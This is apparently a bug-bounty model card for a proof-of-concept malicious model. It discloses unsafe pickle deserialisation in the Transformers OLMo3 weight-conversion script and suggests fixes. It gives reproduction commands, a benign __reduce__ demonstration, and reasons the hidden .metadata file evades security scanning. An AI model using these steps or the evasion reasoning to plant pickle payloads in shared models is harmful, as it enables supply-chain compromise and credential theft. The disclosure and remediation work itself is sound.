⚠️ SECURITY RESEARCH - MALICIOUS MODEL POC

🚨 WARNING: DO NOT USE IN PRODUCTION

This is a proof-of-concept malicious model created for responsible security disclosure.

Purpose: Demonstrate arbitrary code execution vulnerability in Hugging Face Transformers
Program: Huntr Bug Bounty (MFV - Model File Vulnerabilities)
Severity: CRITICAL (CVSS 9.6)
Status: Responsibly disclosed


Vulnerability Details

Summary

This model contains a weaponized .metadata pickle file that executes arbitrary code when loaded by the transformers library's OLMo3 conversion script, with no user warning and no trust_remote_code gate.

Affected Code

File: src/transformers/models/olmo3/convert_olmo3_weights_to_hf.py
Lines: 259-260

with (Path(model_path) / ".metadata").open("rb") as metadata_file:
    metadata = pickle.load(metadata_file)  # ❌ UNSAFE - No validation!
    keys = [key for key in metadata.state_dict_metadata.keys() if key.startswith("model.")]

Proof of Exploitation

When this model is converted using the official conversion script:

python src/transformers/models/olmo3/convert_olmo3_weights_to_hf.py \
    --model-path ./malicious_olmo3_poc \
    --output-dir ./converted

What happens:

  1. ✅ The conversion script loads .metadata using pickle.load()
  2. ✅ The pickle payload triggers via Python's __reduce__ method
  3. ✅ Arbitrary code executes (creates /tmp/huntr_poc_exploited.txt)
  4. ✅ NO WARNING is shown to the user
  5. ✅ NO trust_remote_code check is required

Result: Full arbitrary code execution with process privileges.
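The load-time execution described in step 2 can be shown with a harmless, self-contained sketch (this is an illustration of the mechanism, not the PoC payload): any object whose __reduce__ returns a (callable, args) pair has that callable invoked during deserialization.

```python
import pickle

# Benign illustration only (not the PoC payload): __reduce__ lets an
# object substitute an arbitrary callable for its reconstruction, and
# pickle.loads() invokes that callable, so deserialization itself runs
# attacker-chosen code.
class RunsOnLoad:
    def __reduce__(self):
        return (print, ("code ran during pickle load",))

blob = pickle.dumps(RunsOnLoad())
obj = pickle.loads(blob)  # prints the message with no warning
assert obj is None        # loads() returns print()'s result, not the object
```

The same mechanism works with any importable callable, which is why untrusted pickle data is equivalent to untrusted code.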

Security Impact

CVSS Score: 9.6 (Critical) — CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Attack Vector: Network (AV:N)
Attack Complexity: Low (AC:L)
Privileges Required: None (PR:N)
User Interaction: Required (UI:R)
Scope: Changed (S:C)
Confidentiality: High (C:H)
Integrity: High (I:H)
Availability: High (A:H)

Impact:

  • 🔴 Arbitrary code execution at model load time
  • 🔴 Full system compromise
  • 🔴 Data exfiltration (SSH keys, credentials, API tokens)
  • 🔴 Persistent backdoor installation
  • 🔴 Supply chain attack vector

ProtectAI Scanner Bypass

This vulnerability bypasses Hugging Face's ProtectAI security scanner because:

  1. ✗ The scanner focuses on .pkl weight files, not .metadata files
  2. ✗ Hidden files (names starting with .) are often ignored by scanners
  3. ✗ The file is loaded by a conversion script, not the main model-loading path
  4. ✗ The file has no extension indicating pickle format
  5. ✗ No trust_remote_code validation exists in this code path

Result: Malicious model can be uploaded to HuggingFace Hub and bypass automated security checks.
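One way a scanner could close the extension gap is to detect pickle data by content rather than by file name. The sketch below is an assumption about how such a check might work, not ProtectAI's actual logic: pickles written with protocol 2 or higher begin with the PROTO opcode byte 0x80, so any file starting with it is worth flagging, hidden or not (protocol 0/1 pickles have no such signature and would need opcode-level inspection).

```python
import pickle
import tempfile
from pathlib import Path

# Extension-agnostic heuristic (assumed scanner logic, for illustration):
# protocol >= 2 pickles start with the PROTO opcode (0x80) followed by the
# protocol number, so check the first two bytes regardless of file name.
def looks_like_pickle(path: Path) -> bool:
    head = path.read_bytes()[:2]
    return len(head) == 2 and head[0] == 0x80 and head[1] <= pickle.HIGHEST_PROTOCOL

with tempfile.TemporaryDirectory() as d:
    hidden = Path(d) / ".metadata"  # same hidden name as the PoC file
    hidden.write_bytes(pickle.dumps({"state_dict_metadata": {}}))
    assert looks_like_pickle(hidden)
```

A content-based check like this catches the hidden-file and missing-extension evasions in one pass, at the cost of false positives on unrelated binary formats whose first byte happens to be 0x80.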


Responsible Disclosure

Disclosure Timeline

  • Discovery Date: October 6, 2025
  • Disclosure Platform: Huntr (https://huntr.com)
  • Program: Model File Vulnerabilities (MFV)
  • Status: Reported to maintainers
  • CVE: Pending assignment

Affected Versions

  • ✗ Hugging Face Transformers: All versions with OLMo3 support
  • ✗ Affected Models: OLMo3 checkpoints requiring conversion

Remediation

Immediate Fix:

# BEFORE (UNSAFE):
with (Path(model_path) / ".metadata").open("rb") as metadata_file:
    metadata = pickle.load(metadata_file)

# AFTER (SAFE):
import json
with (Path(model_path) / ".metadata.json").open("r") as metadata_file:
    metadata = json.load(metadata_file)  # Safe - no code execution

Long-term Fix:

  1. Migrate all metadata to JSON format
  2. Deprecate pickle for model metadata
  3. Gate any remaining pickle loads behind a trust_remote_code check
  4. Update ProtectAI scanner to detect .metadata files
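If pickle cannot be dropped immediately, the Python pickle documentation suggests subclassing Unpickler and restricting find_class. A minimal sketch, assuming a small allow-list of harmless builtins (the allow-list contents here are illustrative, not a vetted policy):

```python
import io
import pickle

# Allow-list of globals the unpickler may resolve; everything else,
# including os.system or builtins.exec, is rejected before it can run.
SAFE_GLOBALS = {("builtins", "dict"), ("builtins", "list"), ("builtins", "str")}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")

def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()

# Plain containers round-trip; a payload referencing os.system would raise.
assert restricted_loads(pickle.dumps({"ok": [1, 2]})) == {"ok": [1, 2]}
```

Note that this mitigates only global-lookup payloads; migrating the metadata to JSON, as in the immediate fix above, remains the safer end state.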

Usage Instructions (For Security Researchers)

Testing the Vulnerability

# 1. Clone transformers repository
git clone https://github.com/huggingface/transformers.git
cd transformers

# 2. Clone this PoC model
git lfs install
git clone https://huggingface.co/<USERNAME>/malicious-olmo3-poc

# 3. Run conversion script (triggers exploit)
python src/transformers/models/olmo3/convert_olmo3_weights_to_hf.py \
    --model-path ./malicious-olmo3-poc \
    --output-dir ./converted

# 4. Verify exploitation
cat /tmp/huntr_poc_exploited.txt
# Expected output: "VULNERABILITY EXPLOITED - Arbitrary code executed via pickle deserialization"

What This Proves

✅ Arbitrary code execution during model loading
✅ No user warning or consent required
✅ Bypasses security scanning
✅ Affects real-world usage scenarios


Ethical Guidelines

✅ ALLOWED:

  • Security research and testing in isolated environments
  • Responsible disclosure through official channels
  • Educational use to understand vulnerabilities
  • Contributing fixes to open source projects

❌ PROHIBITED:

  • Using this model in production environments
  • Distributing without security context
  • Executing on shared or production systems
  • Using for malicious purposes
  • Weaponizing with harmful payloads

Contact

Security Researcher: [Your Name/Handle]
Disclosure Platform: Huntr (https://huntr.com)
Project: Hugging Face Transformers
Maintainer Contact: security@huggingface.co


Acknowledgments

  • Hugging Face team for Transformers library
  • ProtectAI for security scanning infrastructure
  • Huntr platform for responsible disclosure process

This model is for security research and responsible disclosure only.
Use in accordance with applicable laws and ethical guidelines.

License

This PoC is provided for security research under responsible disclosure principles. The Transformers library is licensed under Apache 2.0.
